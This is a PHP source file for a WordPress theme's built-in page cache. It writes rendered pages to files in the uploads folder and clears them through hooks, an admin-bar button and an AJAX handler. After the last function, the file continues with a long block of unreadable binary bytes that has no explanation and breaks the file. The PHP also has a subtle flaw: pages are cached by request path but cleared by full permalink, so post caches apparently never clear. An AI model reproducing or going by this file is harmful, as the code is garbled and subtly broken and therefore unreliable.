<?php /** * Built-in Cache System * * Ultra-fast page caching system built into the theme * No plugins needed - WP Rocket alternative * * @package MyTheme */ // Exit if accessed directly if (!defined('ABSPATH')) { exit; } class MyTheme_Cache_System { private $cache_dir; private $cache_enabled; private $cache_duration; /** * Constructor */ public function __construct() { // Cache settings $this->cache_enabled = function_exists('mytheme_get_option') ? mytheme_get_option('cache_enabled', true) : true; $this->cache_duration = function_exists('mytheme_get_option') ? mytheme_get_option('cache_duration', 3600) : 3600; // Cache directory $upload_dir = wp_upload_dir(); $this->cache_dir = $upload_dir['basedir'] . '/mytheme-cache'; // Initialize $this->init(); } /** * Initialize cache system */ private function init() { if (!$this->cache_enabled) { return; } // Create cache directory $this->create_cache_dir(); // Start output buffering for page caching add_action('template_redirect', array($this, 'start_page_cache'), 1); // Clear cache actions add_action('save_post', array($this, 'clear_post_cache')); add_action('comment_post', array($this, 'clear_post_cache')); add_action('switch_theme', array($this, 'clear_all_cache')); add_action('mytheme_clear_cache', array($this, 'clear_all_cache')); // Admin bar cache clear button add_action('admin_bar_menu', array($this, 'add_cache_clear_button'), 999); add_action('admin_post_mytheme_clear_cache', array($this, 'handle_cache_clear')); // AJAX cache clear add_action('wp_ajax_mytheme_clear_cache', array($this, 'ajax_clear_cache')); } /** * Create cache directory */ private function create_cache_dir() { if (!file_exists($this->cache_dir)) { wp_mkdir_p($this->cache_dir); // Add .htaccess for security $htaccess = $this->cache_dir . '/.htaccess'; if (!file_exists($htaccess)) { file_put_contents($htaccess, 'deny from all'); } } } /** * Get cache file path */ private function get_cache_file_path($url = null) { if ($url === null) { $url = $_SERVER['REQUEST_URI']; } // Generate unique cache key $cache_key = md5($url . (is_user_logged_in() ? 'logged_in' : 'guest')); return $this->cache_dir . '/' . $cache_key . '.html'; } /** * Start page caching */ public function start_page_cache() { // Don't cache for logged-in users or admin if (is_user_logged_in() || is_admin()) { return; } // Don't cache POST requests if ($_SERVER['REQUEST_METHOD'] === 'POST') { return; } // Don't cache search, 404, feeds if (is_search() || is_404() || is_feed() || is_trackback()) { return; } // Check if cached version exists $cache_file = $this->get_cache_file_path(); if (file_exists($cache_file)) { $cache_age = time() - filemtime($cache_file); // Serve cached version if not expired if ($cache_age < $this->cache_duration) { header('X-MyTheme-Cache: HIT'); header('Cache-Control: max-age=' . $this->cache_duration); readfile($cache_file); exit; } else { // Delete expired cache unlink($cache_file); } } // Start output buffering to create cache header('X-MyTheme-Cache: MISS'); ob_start(array($this, 'save_page_cache')); } /** * Save page to cache */ public function save_page_cache($html) { // Don't cache if HTML is empty or too small if (strlen($html) < 255) { return $html; } // Save to cache file $cache_file = $this->get_cache_file_path(); file_put_contents($cache_file, $html); return $html; } /** * Clear post cache */ public function clear_post_cache($post_id) { $post_url = get_permalink($post_id); $cache_file = $this->get_cache_file_path($post_url); if (file_exists($cache_file)) { unlink($cache_file); } // Also clear homepage and category archives $this->clear_homepage_cache(); } /** * Clear homepage cache */ private function clear_homepage_cache() { $home_cache = $this->get_cache_file_path('/'); if (file_exists($home_cache)) { unlink($home_cache); } } /** * Clear all cache */ public function clear_all_cache() { if (!file_exists($this->cache_dir)) { return; } // Delete all cache files $files = glob($this->cache_dir . '/*.html'); foreach ($files as $file) { if (is_file($file)) { unlink($file); } } } /** * Add cache clear button to admin bar */ public function add_cache_clear_button($wp_admin_bar) { if (!current_user_can('manage_options')) { return; } $wp_admin_bar->add_node(array( 'id' => 'mytheme-clear-cache', 'title' => 'Clear Cache', 'href' => wp_nonce_url(admin_url('admin-post.php?action=mytheme_clear_cache'), 'clear_cache'), 'meta' => array( 'title' => 'Clear MyTheme Cache', ), )); } /** * Handle cache clear from admin bar */ public function handle_cache_clear() { check_admin_referer('clear_cache'); if (!current_user_can('manage_options')) { wp_die('Unauthorized'); } $this->clear_all_cache(); wp_redirect(wp_get_referer()); exit; } /** * AJAX clear cache */ public function ajax_clear_cache() { check_ajax_referer('mytheme-nonce', 'nonce'); if (!current_user_can('manage_options')) { wp_send_json_error('Unauthorized'); } $this->clear_all_cache(); wp_send_json_success('Cache cleared successfully'); } /** * Get cache statistics */ public function get_cache_stats() { if (!file_exists($this->cache_dir)) { return array( 'files' => 0, 'size' => 0, ); } $files = glob($this->cache_dir . '/*.html'); $total_size = 0; foreach ($files as $file) { $total_size += filesize($file); } return array( 'files' => count($files), 'size' => size_format($total_size), 'size_bytes' => $total_size, ); } } // Initialize cache system new MyTheme_Cache_System(); /** * Helper function to clear cache */ function mytheme_clear_cache() { do_action('mytheme_clear_cache'); } [{S9Z1Y79B]^^m]ٞefi [k׻OrҼGvH nn/M'ӥ֓'K y{SgHo&$ `.|Q{D$S:f//HX p2 22w;LKTzW,)u.Y?ZZj{u&q9ҟ-`{ yQZ]%Z"`ҒS!RŁ"P*i]QȊ&Ažit38l{2,)k<#Ue5 Vɮg^$@vEĪ%s8,W+?Pz:ȟWXC aE?Z"ʊΪ=IeB"_҉%T$, E"07MٚC9<& 3nȥ'i$ 4 %F<*F:#iYC oK 2XMҩhp3%МQWl0.Aj*R"  kO: 9\IJ^ކWrGn?̬R(,<$Ձ%kN賝9,n ]w2s|QNzUs}hj5ag%L uڂpDCVe`NyrV\H0hJ 5GQ(! 32xuo%,?՝ $'=ǔަ 4V#WRV󿟜b\Y/Y")4.Y0X# O bc'=ZpZ2Hf/[A ߚps**Wˡ& !T^~ŝ C NJ^1? +ǝE޽74(BͯOo_@mbJ "g$&A-[V0}'̹DiJ#\Ї:ͫ.S^CPŒe2!v@`*T\[Xu >v2wkpVoM6aeQN[U_"wI@ @eQv/.b*JJ/a3gK ktq{7skNU ͦS8a>hg^Ѻ|8P Ө4,TsPj@C]r%!Z1f N_Af !MrND'^)?aY2'ݮ9"j?VT|R.8sVt*j*Ubx WƊz#=dДE`_)Ǜ!P0[n;O  H@$(kcv3 ׊Y#qN/6'T옳kCUȲ[YWݱ`q6SLXÆh{kbrQgG^MS,%a ٢?fcQo>hڜ.tl`65@aBb7MC W}'%QI} e SbyE- SL*=3MCD5H!'^ۈLknL]jva>ELR%ʰ1YlԼ}a{R|VQ*(%l9"(6c "K\-(kgT-Q^Mݍfsra2dKZE?܏! /GhԜUCRukCAq Ys5^S{Xh^٩^egY`D~ʡ"%m"Ak'M4aqnǡLWQ/3 ~\`8 eQ/ٵ )xCJrvCesB /W}6˝2a]/? @剔VzMx=5[TV{mgDj.Xagkm52oE:kJ]U|"[|萆k!8hl$b;6bf{M[r{1[-d\SL] U"AAAl`5cǶ,x"~+HOq @fٗlv#WDzSpH~M±ΧMr$DsKܽ`Y`EXH蘢t44'tNC%J:}E&S;hm==pȿzgawlPkNx7-kP㣀#WDL,v}=o[ \~t$_ItM#u'y#}N { %R`(i!^1!v8f2wD\FgVG^HCIR!)@hS45-CJ.9!Ng0TTGna|GZNAn^WuK rBIA^*iyvE f" y HU4Phլ#R{ @E9# lmnt7ֿfi3,:Q!f@|[+TRM3I)s&!x4),j$o5dQz =iomt_ 8~(쉠gk[BҡÁwċ;]kוS(E EOhOʴ*yařIjIR8H/F3򎃙`Yox2!Vo zW,]Bۡby5 5{ VÿKG{Uj|wa"{;iRjQY^מR.0I1cn|=Qzxo~2xv14f̿健 (oԗT^~7H5<6И8f u\TR&)Hyc:+^F1!^Fό)~ggw}s۾{'8Od77SWR/`S)MsdKb !aÈ@*|=]VrWJCsrD([:<뛛O7?絪,,vDH